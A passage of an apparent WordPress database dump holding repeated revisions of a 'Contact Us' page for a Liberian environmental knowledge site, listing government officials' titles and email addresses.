href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com </a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 14:57:14','2019-11-15 14:57:14','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2349,1,'2019-11-15 20:08:55','2019-11-15 20:08:55','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong>\nDirector, Ministry of Agriculture\n<a href=\"mailto:Fwmwah1958@yahoo.com\">Fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong>\nAssist. Minister, Ministry of Mines and Energy\n<a href=\"mailto:John.willabo@yahoo.com\">John.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:08:55','2019-11-15 20:08:55','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2350,1,'2019-11-15 20:10:54','2019-11-15 20:10:54','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong>\nDirector, Ministry of Agriculture\n<a href=\"mailto:Fwmwah1958@yahoo.com\">Fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong>\nAssist. Minister, Ministry of Mines and Energy\n<a href=\"mailto:John.willabo@yahoo.com\">John.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong>\nManager, CCCD Project\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><strong>John Willabo Johnson </strong>\nAssist. Minister, Ministry of Mines and Energy\n<a href=\"mailto:John.willabo@yahoo.com\">John.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:10:54','2019-11-15 20:10:54','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2351,1,'2019-11-15 20:11:32','2019-11-15 20:11:32','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong>\nDirector, Ministry of Agriculture\n<a href=\"mailto:Fwmwah1958@yahoo.com\">Fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong>\nAssist. Minister, Ministry of Mines and Energy\n<a href=\"mailto:John.willabo@yahoo.com\">John.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:11:32','2019-11-15 20:11:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2352,1,'2019-11-15 20:13:59','2019-11-15 20:13:59','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:Kamara.ed14@gmail.com\">Kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:13:59','2019-11-15 20:13:59','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2353,1,'2019-11-15 20:14:31','2019-11-15 20:14:31','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:14:31','2019-11-15 20:14:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2354,1,'2019-11-15 20:16:02','2019-11-15 20:16:02','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer<br>\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\n<br>\nMEAs Coordinator\n<br>\nUNFCCC Focal Point\n<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong><br>\nCoordinator Climate Change Secretariat<br>\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a>\n<strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:16:02','2019-11-15 20:16:02','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2355,1,'2019-11-15 20:17:07','2019-11-15 20:17:07','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, EPA<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong><br>\nAssistant Manager, ESIA, EPA<br>\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong><br>\nEIA Manager, FDA<br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:17:07','2019-11-15 20:17:07','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2356,1,'2019-11-15 20:38:34','2019-11-15 20:38:34','<h2>Contact Us</h2>\nPlease contact the EKMS Team for further information relating to this website.\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>\n<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\">\nContact Form Coming up\n<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\">\n<strong>J.S. Datuama Cammue</strong>\nMEAs Officer, EPA\nUNCBD Focal Point\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong>\nMEAs Coordinator, EPA\nUNFCCC Focal Point\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong>\nGIS Coordinator, EPA\nUNCCD Focal Point\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, Compliance and Enforcement, EPA\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Kawusu Toure</strong>\nAssistant Manager, ESIA, EPA\n<a href=\"mailto:kawumtoure@gmail.com\">kawumtoure@gmail.com</a><strong>Konikay Nimely</strong>\nEIA Manager, FDA\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\nMarketing and Forest Forecast\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\nConservation Manager, FDA\n<a href=\"mailto:blamahg@yahoo.com\">blamag@gmail.com</a><strong>Francis W. Mwah</strong>\nDirector @ MOA\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong>\nAssistant Minister, MME\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong>\nLand Use Management Manager, LLA\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a><strong>Aaron S.M. Wesseh</strong>\nManager, CCCD Project\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2019-11-15 20:38:34','2019-11-15 20:38:34','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(2357,1,'2019-11-15 20:39:30','2019-11-15 20:39:30','','Berexford S. Jallah','','inherit','open','closed','','knowledge_broker_bj-2','','','2019-11-16 03:52:01','2019-11-16 03:52:01','',80,'https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BJ-1.jpg',0,'attachment','image/jpeg',0),(2359,1,'2019-11-15 20:43:06','2019-11-15 20:43:06','','Benjamin Karmorh','','inherit','open','closed','','knowledge_broker_bk','','','2019-11-16 20:00:43','2019-11-16 20:00:43','',80,'https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg',0,'attachment','image/jpeg',0),(2360,1,'2019-11-15 20:43:07','2019-11-15 20:43:07','','Kawusu Toure','','inherit','open','closed','','knowledge_broker_kt','','','2019-11-16 03:50:31','2019-11-16 03:50:31','',80,'https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_KT.jpg',0,'attachment','image/jpeg',0),(2361,1,'2019-11-15 20:44:14','2019-11-15 20:44:14','<h2>Contact Us</h2>		\n		Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk.</a>		\n										<img width=\"700\" height=\"573\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_manager_UV-300x246.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		Contact Form Coming up		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"knowledge_broker_DC\" alt=\"knowledge_broker_DC\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg\" alt=\"\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2019/11/knowledge_broker_BK-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BJ-1-ogrs9wvimfha3qy6qlh3hvheny61c0row4oziv8ha0.jpg\" title=\"knowledge_broker_BJ\" alt=\"knowledge_broker_BJ\" />											\n		<strong>J.S. Datuama Cammue</strong><br>\nMEAs Officer, EPA<br>\nUNCBD Focal Point<br>\n<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a><strong>Benjamin Karmorh</strong><br>\nMEAs Coordinator, EPA<br>\nUNFCCC Focal Point<br>\n<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a><strong>Berexford S. Jallah</strong><br>\nGIS Coordinator, EPA<br>\nUNCCD Focal Point<br>\n<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a><strong>Jeremiah Sokan Sr</strong>\nCoordinator Climate Change Secretariat, EPA\n<a href=\"mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a><strong>John K. Jallah</strong><br>\nManager, Compliance and Enforcement, 